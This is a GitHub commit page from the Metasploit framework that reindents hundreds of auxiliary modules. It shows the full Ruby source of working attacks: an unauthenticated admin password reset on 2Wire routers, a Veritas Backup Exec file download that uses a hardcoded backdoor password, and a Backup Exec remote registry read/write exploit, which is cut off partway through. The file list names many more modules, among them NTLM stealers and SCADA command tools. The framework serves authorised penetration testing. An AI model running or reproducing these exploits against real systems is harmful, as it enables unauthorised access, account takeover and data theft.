Browse files

Retab modules

  • Loading branch information...
1 parent 7e5e0f7 commit 41e4375e43443bb568729a3079d3bf9944cbc669 @tabassassin tabassassin committed Aug 30, 2013
Showing with 9,564 additions and 9,564 deletions.
  1. +131 −131 modules/auxiliary/admin/2wire/xslt_password_reset.rb
  2. +264 −264 modules/auxiliary/admin/backupexec/dump.rb
  3. +263 −263 modules/auxiliary/admin/backupexec/registry.rb
  4. +93 −93 modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
  5. +60 −60 modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
  6. +80 −80 modules/auxiliary/admin/db2/db2rcmd.rb
  7. +61 −61 modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
  8. +139 −139 modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
  9. +50 −50 modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb
  10. +47 −47 modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
  11. +76 −76 modules/auxiliary/admin/hp/hp_data_protector_cmd.rb
  12. +170 −170 modules/auxiliary/admin/http/axigen_file_access.rb
  13. +51 −51 modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
  14. +56 −56 modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
  15. +71 −71 modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
  16. +70 −70 modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
  17. +134 −134 modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb
  18. +40 −40 modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
  19. +84 −84 modules/auxiliary/admin/http/iis_auth_bypass.rb
  20. +103 −103 modules/auxiliary/admin/http/intersil_pass_reset.rb
  21. +48 −48 modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
  22. +91 −91 modules/auxiliary/admin/http/jboss_seam_exec.rb
  23. +82 −82 modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
  24. +192 −192 modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb
  25. +167 −167 modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
  26. +122 −122 modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
  27. +49 −49 modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb
  28. +154 −154 modules/auxiliary/admin/http/rails_devise_pass_reset.rb
  29. +69 −69 modules/auxiliary/admin/http/scrutinizer_add_user.rb
  30. +120 −120 modules/auxiliary/admin/http/tomcat_administration.rb
  31. +91 −91 modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
  32. +87 −87 modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
  33. +140 −140 modules/auxiliary/admin/http/typo3_sa_2009_001.rb
  34. +96 −96 modules/auxiliary/admin/http/typo3_sa_2009_002.rb
  35. +131 −131 modules/auxiliary/admin/http/typo3_sa_2010_020.rb
  36. +193 −193 modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb
  37. +67 −67 modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb
  38. +107 −107 modules/auxiliary/admin/misc/wol.rb
  39. +50 −50 modules/auxiliary/admin/motorola/wr850g_cred.rb
  40. +73 −73 modules/auxiliary/admin/ms/ms08_059_his2006.rb
  41. +799 −799 modules/auxiliary/admin/mssql/mssql_enum.rb
  42. +23 −23 modules/auxiliary/admin/mssql/mssql_exec.rb
  43. +448 −448 modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
  44. +143 −143 modules/auxiliary/admin/mssql/mssql_idf.rb
  45. +72 −72 modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb
  46. +48 −48 modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
  47. +37 −37 modules/auxiliary/admin/mssql/mssql_sql.rb
  48. +40 −40 modules/auxiliary/admin/mssql/mssql_sql_file.rb
  49. +200 −200 modules/auxiliary/admin/mysql/mysql_enum.rb
  50. +36 −36 modules/auxiliary/admin/mysql/mysql_sql.rb
  51. +90 −90 modules/auxiliary/admin/natpmp/natpmp_map.rb
  52. +48 −48 modules/auxiliary/admin/officescan/tmlisten_traversal.rb
  53. +59 −59 modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
  54. +49 −49 modules/auxiliary/admin/oracle/oracle_login.rb
  55. +42 −42 modules/auxiliary/admin/oracle/oracle_sql.rb
  56. +679 −679 modules/auxiliary/admin/oracle/oraenum.rb
  57. +33 −33 modules/auxiliary/admin/oracle/osb_execqr.rb
  58. +53 −53 modules/auxiliary/admin/oracle/osb_execqr2.rb
  59. +50 −50 modules/auxiliary/admin/oracle/osb_execqr3.rb
  60. +73 −73 modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
  61. +63 −63 modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
  62. +57 −57 modules/auxiliary/admin/oracle/sid_brute.rb
  63. +51 −51 modules/auxiliary/admin/oracle/tnscmd.rb
  64. +45 −45 modules/auxiliary/admin/pop2/uw_fileretrieval.rb
  65. +59 −59 modules/auxiliary/admin/postgres/postgres_readfile.rb
  66. +49 −49 modules/auxiliary/admin/postgres/postgres_sql.rb
  67. +56 −56 modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
  68. +195 −195 modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb
  69. +50 −50 modules/auxiliary/admin/scada/igss_exec_17.rb
  70. +163 −163 modules/auxiliary/admin/scada/modicon_command.rb
  71. +209 −209 modules/auxiliary/admin/scada/modicon_password_recovery.rb
  72. +286 −286 modules/auxiliary/admin/scada/modicon_stux_transfer.rb
  73. +123 −123 modules/auxiliary/admin/scada/multi_cip_command.rb
  74. +348 −348 modules/auxiliary/admin/serverprotect/file.rb
  75. +77 −77 modules/auxiliary/admin/smb/check_dir_file.rb
  76. +75 −75 modules/auxiliary/admin/smb/list_directory.rb
  77. +123 −123 modules/auxiliary/admin/smb/psexec_command.rb
  78. +231 −231 modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
  79. +54 −54 modules/auxiliary/admin/smb/samba_symlink_traversal.rb
  80. +56 −56 modules/auxiliary/admin/smb/upload_file.rb
Sorry, we could not display the entire diff because too many files (2,264) changed.
View
262 modules/auxiliary/admin/2wire/xslt_password_reset.rb
@@ -9,136 +9,136 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::HttpClient
-
- def initialize(info={})
- super(update_info(info,
- 'Name' => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
- 'Description' => %q{
- This module will reset the admin password on a 2Wire wireless router. This is
- done by using the /xslt page where authentication is not required, thus allowing
- configuration changes (such as resetting the password) as administrators.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'hkm [at] hakim.ws', #Initial discovery, poc
- 'Travis Phillips', #Msf module
- ],
- 'References' =>
- [
- [ 'CVE', '2007-4387' ],
- [ 'OSVDB', '37667' ],
- [ 'BID', '36075' ],
- [ 'URL', 'http://seclists.org/bugtraq/2007/Aug/225' ],
- ],
- 'DisclosureDate' => "Aug 15 2007" ))
-
- register_options(
- [
- OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
- ], self.class)
- end
-
- def run
-
- print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
- res = send_request_raw(
- {
- 'method' => 'GET',
- 'uri' => '/xslt?PAGE=A07',
- }, 25)
-
- if not res
- print_error("No response from server")
- return
- end
-
- #check to see if we get HTTP OK
- if (res.code == 200)
- print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
- else
- print_error("Did not get HTTP 200, URL was not found. Exiting!")
- return
- end
-
- #Check to verify server reported is a 2wire router
- if (res.headers['Server'].match(/2wire Gateway/i))
- print_status("Server is a 2wire Gateway! Grabbing info\n")
- else
- print_error("Target doesn't seem to be a 2wire router. Exiting!")
- return
- end
-
- print_status("---===[ Router Information ]===---")
-
- # Grabbing the Model Number
- if res.body.match(/<td class="textmono">(.*)<\/td>/i)
- model = $1
- print_status("Model: #{model}")
- end
-
- # Grabbing the serial Number
- if res.body.match(/<td class="data">(\d{12})<\/td>/i)
- serial = $1
- print_status("Serial: #{serial}")
- end
-
- # Grabbing the Hardware Version
- if res.body.match(/<td class="data">(\d{4}-\d{6}-\d{3})<\/td>/i)
- hardware = $1
- print_status("Hardware Version: #{hardware}")
- end
-
- #Check the Software Version
- if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
- ver = $1
- print_status("Software version: #{ver}")
- else
- print_error("Target is not a version 5 router. Exiting!")
- return
- end
-
- # Grabbing the Key Code
- if res.body.match(/<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)
- key = $1
- print_status("Key Code: #{key}\n")
- end
-
- print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
- print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
-
- res = send_request_raw(
- {
- 'method' => 'GET',
- 'uri' => '/xslt?PAGE=H04',
- }, 25)
-
- if ( res and res.code == 200 and res.body.match(/<title>System Setup - Password<\/title>/i))
- print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
-
- data = 'PAGE=H04_POST'
- data << '&THISPAGE=H04'
- data << '&NEXTPAGE=A01'
- data << '&PASSWORD=' + datastore['PASSWORD']
- data << '&PASSWORD_CONF=' + datastore['PASSWORD']
- data << '&HINT='
-
- res = send_request_cgi(
- {
- 'method' => 'POST',
- 'uri' => '/xslt',
- 'data' => data,
- }, 25)
-
- if res and res.code == 200
- if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//))
- cookie= $1
- print_status("Got cookie #{cookie}. Password reset was successful!\n")
- end
- end
- end
-
- end
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
+ 'Description' => %q{
+ This module will reset the admin password on a 2Wire wireless router. This is
+ done by using the /xslt page where authentication is not required, thus allowing
+ configuration changes (such as resetting the password) as administrators.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'hkm [at] hakim.ws', #Initial discovery, poc
+ 'Travis Phillips', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2007-4387' ],
+ [ 'OSVDB', '37667' ],
+ [ 'BID', '36075' ],
+ [ 'URL', 'http://seclists.org/bugtraq/2007/Aug/225' ],
+ ],
+ 'DisclosureDate' => "Aug 15 2007" ))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
+ ], self.class)
+ end
+
+ def run
+
+ print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/xslt?PAGE=A07',
+ }, 25)
+
+ if not res
+ print_error("No response from server")
+ return
+ end
+
+ #check to see if we get HTTP OK
+ if (res.code == 200)
+ print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
+ else
+ print_error("Did not get HTTP 200, URL was not found. Exiting!")
+ return
+ end
+
+ #Check to verify server reported is a 2wire router
+ if (res.headers['Server'].match(/2wire Gateway/i))
+ print_status("Server is a 2wire Gateway! Grabbing info\n")
+ else
+ print_error("Target doesn't seem to be a 2wire router. Exiting!")
+ return
+ end
+
+ print_status("---===[ Router Information ]===---")
+
+ # Grabbing the Model Number
+ if res.body.match(/<td class="textmono">(.*)<\/td>/i)
+ model = $1
+ print_status("Model: #{model}")
+ end
+
+ # Grabbing the serial Number
+ if res.body.match(/<td class="data">(\d{12})<\/td>/i)
+ serial = $1
+ print_status("Serial: #{serial}")
+ end
+
+ # Grabbing the Hardware Version
+ if res.body.match(/<td class="data">(\d{4}-\d{6}-\d{3})<\/td>/i)
+ hardware = $1
+ print_status("Hardware Version: #{hardware}")
+ end
+
+ #Check the Software Version
+ if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
+ ver = $1
+ print_status("Software version: #{ver}")
+ else
+ print_error("Target is not a version 5 router. Exiting!")
+ return
+ end
+
+ # Grabbing the Key Code
+ if res.body.match(/<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)
+ key = $1
+ print_status("Key Code: #{key}\n")
+ end
+
+ print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
+ print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
+
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/xslt?PAGE=H04',
+ }, 25)
+
+ if ( res and res.code == 200 and res.body.match(/<title>System Setup - Password<\/title>/i))
+ print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
+
+ data = 'PAGE=H04_POST'
+ data << '&THISPAGE=H04'
+ data << '&NEXTPAGE=A01'
+ data << '&PASSWORD=' + datastore['PASSWORD']
+ data << '&PASSWORD_CONF=' + datastore['PASSWORD']
+ data << '&HINT='
+
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => '/xslt',
+ 'data' => data,
+ }, 25)
+
+ if res and res.code == 200
+ if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//))
+ cookie= $1
+ print_status("Got cookie #{cookie}. Password reset was successful!\n")
+ end
+ end
+ end
+
+ end
end
View
528 modules/auxiliary/admin/backupexec/dump.rb
@@ -11,269 +11,269 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::NDMP
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Veritas Backup Exec Windows Remote File Access',
- 'Description' => %q{
- This module abuses a logic flaw in the Backup Exec Windows Agent to download
- arbitrary files from the system. This flaw was found by someone who wishes to
- remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
- output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
- listed in the references section. To transfer an entire directory, specify a
- path that includes a trailing backslash.
- },
- 'Author' => [ 'hdm', 'Unknown' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['CVE', '2005-2611'],
- ['OSVDB', '18695'],
- ['BID', '14551'],
- ['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
- ],
- 'Actions' =>
- [
- ['Download']
- ],
- 'DefaultAction' => 'Download'
- ))
-
- register_options(
- [
- Opt::RPORT(10000),
- OptAddress.new('LHOST',
- [
- false,
- "The local IP address to accept the data connection"
- ]
- ),
- OptPort.new('LPORT',
- [
- false,
- "The local port to accept the data connection"
- ]
- ),
- OptString.new('RPATH',
- [
- true,
- "The remote filesystem path to download",
- "C:\\boot.ini"
- ]
- ),
- OptString.new('LPATH',
- [
- true,
- "The local filename to store the exported data",
- "backupexec_dump.mtf"
- ]
- ),
- ], self.class)
- end
-
- def run
- print_status("Attempting to retrieve #{datastore['RPATH']}...")
-
- lfd = File.open(datastore['LPATH'], 'wb')
-
- connect
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response from the agent")
- disconnect
- return
- end
-
- username = "root"
- password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
-
- #
- # Authenticate using the backdoor password
- #
- auth = [
- 1,
- Time.now.to_i,
- 0,
- 0x0901,
- 0,
- 0,
- 2,
- username.length,
- username,
- password
- ].pack('NNNNNNNNA*A*')
-
- print_status("Sending magic authentication request...")
- ndmp_send(auth)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our authentication request")
- disconnect
- return
- end
-
-
- #
- # Create our listener for the data connection
- #
- print_status("Starting our data listener...")
- sfd = Rex::Socket.create_tcp_server(
- 'LocalPort' => datastore['LPORT']
- )
-
- local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
- local_port = sfd.getsockname[2]
-
- #
- # Create the DATA_CONNECT request
- #
- conn = [
- 3,
- 0,
- 0,
- 0x040a,
- 0,
- 0,
- 1,
- Rex::Socket.gethostbyname(local_addr)[3],
- local_port
- ].pack('NNNNNNNA4N')
-
- print_status("Sending data connection request...")
- ndmp_send(conn)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our data connection request")
- sfd.close
- disconnect
- return
- end
-
- #
- # Wait for the agent to connect back
- #
- print_status("Waiting for the data connection...")
- rfd = sfd.accept()
- sfd.close
-
-
- #
- # Create the Mover Set Record Size request
- #
- msrs = [
- 4,
- 0,
- 0,
- 0x0a08,
- 0,
- 0,
- 0x8000
- ].pack('NNNNNNN')
-
- print_status("Sending transfer parameters...")
- ndmp_send(msrs)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our parameters request")
- disconnect
- return
- end
-
- #
- # Define our tranfer parameters
- #
- xenv =
- [
- ['USERNAME', ''],
- ['BU_EXCLUDE_ACTIVE_FILES', '0'],
- ['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
- ]
-
- #
- # Create the DATA_START_BACKUP request
- #
- bkup = [
- 5,
- 0,
- 0,
- 0x0401,
- 0,
- 0,
- 4
- ].pack('NNNNNNN')
- bkup += "dump"
- bkup += [ xenv.length ].pack('N')
-
- #
- # Encode the transfer parameters
- #
- xenv.each do |e|
- k,v = e
-
- # Variable
- bkup += [k.length].pack('N')
- bkup += k
- bkup += Rex::Encoder::NDR.align(k)
-
- # Value
- bkup += [v.length].pack('N')
- bkup += v
- bkup += Rex::Encoder::NDR.align(v)
- end
-
- bkup[-1, 1] = "\x01"
-
- print_status("Sending backup request...")
- ndmp_send(bkup)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our backup request")
- disconnect
- return
- end
-
- #
- # Create the GET_ENV request
- #
- genv = [
- 5,
- 0,
- 0,
- 0x4004,
- 0,
- 0
- ].pack('NNNNNN')
-
- print_status("Sending environment request...")
- ndmp_send(genv)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our environment request")
- disconnect
- return
- end
-
- #
- # Start transferring data
- #
- print_status("Transferring data...")
- bcnt = 0
-
- begin
- while (data = rfd.get_once)
- bcnt += data.length
- lfd.write(data)
- end
- rescue ::EOFError
- end
-
- lfd.close
- rfd.close
-
- print_status("Transferred #{bcnt} bytes.")
- disconnect
-
- end
+ include Msf::Exploit::Remote::NDMP
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Veritas Backup Exec Windows Remote File Access',
+ 'Description' => %q{
+ This module abuses a logic flaw in the Backup Exec Windows Agent to download
+ arbitrary files from the system. This flaw was found by someone who wishes to
+ remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
+ output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
+ listed in the references section. To transfer an entire directory, specify a
+ path that includes a trailing backslash.
+ },
+ 'Author' => [ 'hdm', 'Unknown' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2005-2611'],
+ ['OSVDB', '18695'],
+ ['BID', '14551'],
+ ['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
+ ],
+ 'Actions' =>
+ [
+ ['Download']
+ ],
+ 'DefaultAction' => 'Download'
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(10000),
+ OptAddress.new('LHOST',
+ [
+ false,
+ "The local IP address to accept the data connection"
+ ]
+ ),
+ OptPort.new('LPORT',
+ [
+ false,
+ "The local port to accept the data connection"
+ ]
+ ),
+ OptString.new('RPATH',
+ [
+ true,
+ "The remote filesystem path to download",
+ "C:\\boot.ini"
+ ]
+ ),
+ OptString.new('LPATH',
+ [
+ true,
+ "The local filename to store the exported data",
+ "backupexec_dump.mtf"
+ ]
+ ),
+ ], self.class)
+ end
+
+ def run
+ print_status("Attempting to retrieve #{datastore['RPATH']}...")
+
+ lfd = File.open(datastore['LPATH'], 'wb')
+
+ connect
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response from the agent")
+ disconnect
+ return
+ end
+
+ username = "root"
+ password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
+
+ #
+ # Authenticate using the backdoor password
+ #
+ auth = [
+ 1,
+ Time.now.to_i,
+ 0,
+ 0x0901,
+ 0,
+ 0,
+ 2,
+ username.length,
+ username,
+ password
+ ].pack('NNNNNNNNA*A*')
+
+ print_status("Sending magic authentication request...")
+ ndmp_send(auth)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our authentication request")
+ disconnect
+ return
+ end
+
+
+ #
+ # Create our listener for the data connection
+ #
+ print_status("Starting our data listener...")
+ sfd = Rex::Socket.create_tcp_server(
+ 'LocalPort' => datastore['LPORT']
+ )
+
+ local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
+ local_port = sfd.getsockname[2]
+
+ #
+ # Create the DATA_CONNECT request
+ #
+ conn = [
+ 3,
+ 0,
+ 0,
+ 0x040a,
+ 0,
+ 0,
+ 1,
+ Rex::Socket.gethostbyname(local_addr)[3],
+ local_port
+ ].pack('NNNNNNNA4N')
+
+ print_status("Sending data connection request...")
+ ndmp_send(conn)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our data connection request")
+ sfd.close
+ disconnect
+ return
+ end
+
+ #
+ # Wait for the agent to connect back
+ #
+ print_status("Waiting for the data connection...")
+ rfd = sfd.accept()
+ sfd.close
+
+
+ #
+ # Create the Mover Set Record Size request
+ #
+ msrs = [
+ 4,
+ 0,
+ 0,
+ 0x0a08,
+ 0,
+ 0,
+ 0x8000
+ ].pack('NNNNNNN')
+
+ print_status("Sending transfer parameters...")
+ ndmp_send(msrs)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our parameters request")
+ disconnect
+ return
+ end
+
+ #
+ # Define our tranfer parameters
+ #
+ xenv =
+ [
+ ['USERNAME', ''],
+ ['BU_EXCLUDE_ACTIVE_FILES', '0'],
+ ['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
+ ]
+
+ #
+ # Create the DATA_START_BACKUP request
+ #
+ bkup = [
+ 5,
+ 0,
+ 0,
+ 0x0401,
+ 0,
+ 0,
+ 4
+ ].pack('NNNNNNN')
+ bkup += "dump"
+ bkup += [ xenv.length ].pack('N')
+
+ #
+ # Encode the transfer parameters
+ #
+ xenv.each do |e|
+ k,v = e
+
+ # Variable
+ bkup += [k.length].pack('N')
+ bkup += k
+ bkup += Rex::Encoder::NDR.align(k)
+
+ # Value
+ bkup += [v.length].pack('N')
+ bkup += v
+ bkup += Rex::Encoder::NDR.align(v)
+ end
+
+ bkup[-1, 1] = "\x01"
+
+ print_status("Sending backup request...")
+ ndmp_send(bkup)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our backup request")
+ disconnect
+ return
+ end
+
+ #
+ # Create the GET_ENV request
+ #
+ genv = [
+ 5,
+ 0,
+ 0,
+ 0x4004,
+ 0,
+ 0
+ ].pack('NNNNNN')
+
+ print_status("Sending environment request...")
+ ndmp_send(genv)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our environment request")
+ disconnect
+ return
+ end
+
+ #
+ # Start transferring data
+ #
+ print_status("Transferring data...")
+ bcnt = 0
+
+ begin
+ while (data = rfd.get_once)
+ bcnt += data.length
+ lfd.write(data)
+ end
+ rescue ::EOFError
+ end
+
+ lfd.close
+ rfd.close
+
+ print_status("Transferred #{bcnt} bytes.")
+ disconnect
+
+ end
end
View
526 modules/auxiliary/admin/backupexec/registry.rb
@@ -11,268 +11,268 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::DCERPC
- include ::Rex::Platforms::Windows
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Veritas Backup Exec Server Registry Access',
- 'Description' => %q{
- This modules exploits a remote registry access flaw in the BackupExec Windows
- Server RPC service. This vulnerability was discovered by Pedram Amini and is based
- on the NDR stub information information posted to openrce.org.
- Please see the action list for the different attack modes.
-
- },
- 'Author' => [ 'hdm' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'OSVDB', '17627' ],
- [ 'CVE', '2005-0771' ],
- [ 'URL', 'http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities'],
- ],
- 'Actions' =>
- [
- ['System Information'],
- ['Create Logon Notice']
- ],
- 'DefaultAction' => 'System Information'
- ))
-
- register_options(
- [
- Opt::RPORT(6106),
- OptString.new('WARN',
- [
- false,
- "The warning to display for the Logon Notice action",
- "Compromised by Metasploit!\r\n"
- ]
- ),
- ], self.class)
- end
-
- def auxiliary_commands
- return {
- "regread" => "Read a registry value",
- # "regenum" => "Enumerate registry keys",
- }
- end
-
- def run
- case action.name
- when 'System Information'
- system_info()
- when 'Create Logon Notice'
- logon_notice()
- end
- end
-
-
- def cmd_regread(*args)
-
- if (args.length == 0)
- print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
- return
- end
-
- paths = args[0].split("\\")
- hive = paths.shift
- subval = paths.pop
- subkey = paths.join("\\")
- data = backupexec_regread(hive, subkey, subval)
-
- if (data)
- print_status("DATA: #{deunicode(data)}")
- else
- print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
- end
-
- end
-
- def cmd_regenum(*args)
-
- if (args.length == 0)
- print_status("Usage: regenum HKLM\\\\Software")
- return
- end
-
- paths = args[0].split("\\")
- hive = paths.shift
- subkey = "\\" + paths.join("\\")
- data = backupexec_regenum(hive, subkey)
-
- if (data)
- print_status("DATA: #{deunicode(data)}")
- else
- print_error("Failed to enumerate #{hive}\\#{subkey}...")
- end
-
- end
-
- def system_info
- print_status("Dumping system information...")
-
- prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
- prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
- prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
- owner = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'
- company = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'
- cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
- username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'
-
- print_status("The current interactive user is #{deunicode(username)}")
- print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
- print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
- print_status("The system runs on a #{deunicode(cpu)}")
- end
-
- def logon_notice
- print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
- backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
- backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
- end
-
-
- def deunicode(str)
- str.gsub(/\x00/, '').strip
- end
-
- #
- # Write a registry key
- #
- def backupexec_regwrite(hive, subkey, subval, type, data)
- stub = backupexec_regrpc_write(
- :hive => registry_hive_lookup(hive),
- :subkey => subkey,
- :subval => subval,
- :type => type,
- :data => data
- )
- resp = backupexec_regrpc_call(5, stub)
- return false if resp.length == 0
- return true
- end
-
- #
- # Read a registry key
- #
- def backupexec_regread(hive, subkey, subval, type = REG_SZ)
- stub = backupexec_regrpc_read(
- :hive => registry_hive_lookup(hive),
- :subkey => subkey,
- :subval => subval,
- :type => type
- )
- resp = backupexec_regrpc_call(4, stub)
-
- return nil if resp.length == 0
- ret, len = resp[0,8].unpack('VV')
- return nil if ret == 0
- return nil if len == 0
- return resp[8, len]
- end
-
- #
- # Enumerate a registry key
- #
- def backupexec_regenum(hive, subkey)
- stub = backupexec_regrpc_enum(
- :hive => registry_hive_lookup(hive),
- :subkey => subkey
- )
- resp = backupexec_regrpc_call(7, stub)
- p resp
-
- return nil if resp.length == 0
- ret, len = resp[0,8].unpack('VV')
- return nil if ret == 0
- return nil if len == 0
- return resp[8, len]
- end
-
- #
- # Call the backupexec registry service
- #
- def backupexec_regrpc_call(opnum, data = '')
-
- handle = dcerpc_handle(
- '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
- 'ncacn_ip_tcp', [datastore['RPORT']]
- )
-
- dcerpc_bind(handle)
-
- resp = dcerpc.call(opnum, data)
- outp = ''
-
- if (dcerpc.last_response and dcerpc.last_response.stub_data)
- outp = dcerpc.last_response.stub_data
- end
-
- disconnect
-
- outp
- end
-
- # RPC Service 4
- def backupexec_regrpc_read(opts = {})
- subkey = opts[:subkey] || ''
- subval = opts[:subval] || ''
- hive = opts[:hive] || HKEY_LOCAL_MACHINE
- type = opts[:type] || REG_SZ
-
- stub =
- NDR.UnicodeConformantVaryingString(subkey) +
- NDR.UnicodeConformantVaryingString(subval) +
- NDR.long(type) +
- NDR.long(1024) +
- NDR.long(0) +
- NDR.long(4) +
- NDR.long(4) +
- NDR.long(hive)
- return stub
- end
-
- # RPC Service 7
- def backupexec_regrpc_enum(opts = {})
- subkey = opts[:subkey] || ''
- hive = opts[:hive] || HKEY_LOCAL_MACHINE
- stub =
- NDR.UnicodeConformantVaryingString(subkey) +
